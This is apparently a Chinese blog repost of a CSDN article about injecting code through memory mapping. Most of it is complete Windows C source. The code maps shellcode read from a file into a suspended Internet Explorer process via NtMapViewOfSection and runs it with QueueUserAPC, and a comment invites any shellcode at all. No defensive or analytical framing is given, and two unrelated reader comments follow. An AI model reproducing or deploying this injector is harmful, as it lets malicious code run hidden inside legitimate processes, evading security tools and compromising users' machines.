ڼС
梦回起点
做你害怕做的事,你会发现:不过如此
本站基于WordPress—主题by 设计窝
冀ICP备15003737号
梦回起点
Copyright © 2015-2024 All rights reserved.

使用内存映射注入代码

#define _WIN32_WINNT 0x0400
#include <windows.h>

typedef LONG NTSTATUS, *PNTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

typedef enum _SECTION_INHERIT 
{
ViewShare = 1,
ViewUnmap = 2
} SECTION_INHERIT;

typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE, HANDLE, LPVOID, ULONG, SIZE_T, LARGE_INTEGER*, SIZE_T*, SECTION_INHERIT, ULONG, ULONG );

func_NtMapViewOfSection NtMapViewOfSection = NULL;

LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, 
DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress ) 
{
NTSTATUS Status;
LARGE_INTEGER SectionOffset;
ULONG ViewSize;
ULONG Protect;
LPVOID ViewBase;

// 转换偏移量
SectionOffset.LowPart = dwFileOffsetLow;
SectionOffset.HighPart = dwFileOffsetHigh;

// 保存大小和起始地址
ViewBase = lpBaseAddress;
ViewSize = dwNumberOfBytesToMap;

// 转换标志为NT保护属性
if (dwDesiredAccess & FILE_MAP_WRITE)
{
Protect = PAGE_READWRITE;
}
else if (dwDesiredAccess & FILE_MAP_READ)
{
Protect = PAGE_READONLY;
}
else if (dwDesiredAccess & FILE_MAP_COPY)
{
Protect = PAGE_WRITECOPY;
}
else
{
Protect = PAGE_NOACCESS;
}

//映射区段
Status = NtMapViewOfSection(hFileMappingObject,
hProcess,
&ViewBase,
0,
0,
      &SectionOffset,
&ViewSize,
      ViewShare,
      0,
Protect);
if (!NT_SUCCESS(Status))
{
// 失败
return NULL;
}

//返回起始地址
  return ViewBase;
}

int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
{
HMODULE hDll = LoadLibrary( "ntdll.dll" );

NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");

// 取ShellCode,任何你想实现的
HANDLE hFile = CreateFile ("C:\\shellcode.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);

// 启动目标进程
STARTUPINFO st; 
ZeroMemory (&st, sizeof(st));
st.cb = sizeof (STARTUPINFO);

PROCESS_INFORMATION pi;
ZeroMemory (&pi, sizeof(pi));

CreateProcess ("C:\\Programme\\Internet Explorer\\iexplore.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &pi);

// 注入shellcode到目标进程地址空间
LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);

// 创建一个新的能够在目标线程恢复是首先执行的APC
QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);
ResumeThread (pi.hThread);
CloseHandle (hFile);
CloseHandle (hMappedFile);
CloseHandle (pi.hThread);
CloseHandle (pi.hProcess);
return 0;
}

————————————————
版权声明:本文为CSDN博主「花熊」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/hgy413/java/article/details/7799843

2022-05-23
                         
 1. 快乐编程,快乐生活

  似此星辰非昨夜,为谁风露立中宵。

 2. 快乐编程,快乐生活

  通常一个年轻的姑娘,起初只认为婚姻是双方纯洁的结合,后来才突然发现了肉体的爱情,也就是精神上最纯洁的感情所产生的有力的结果

发表回复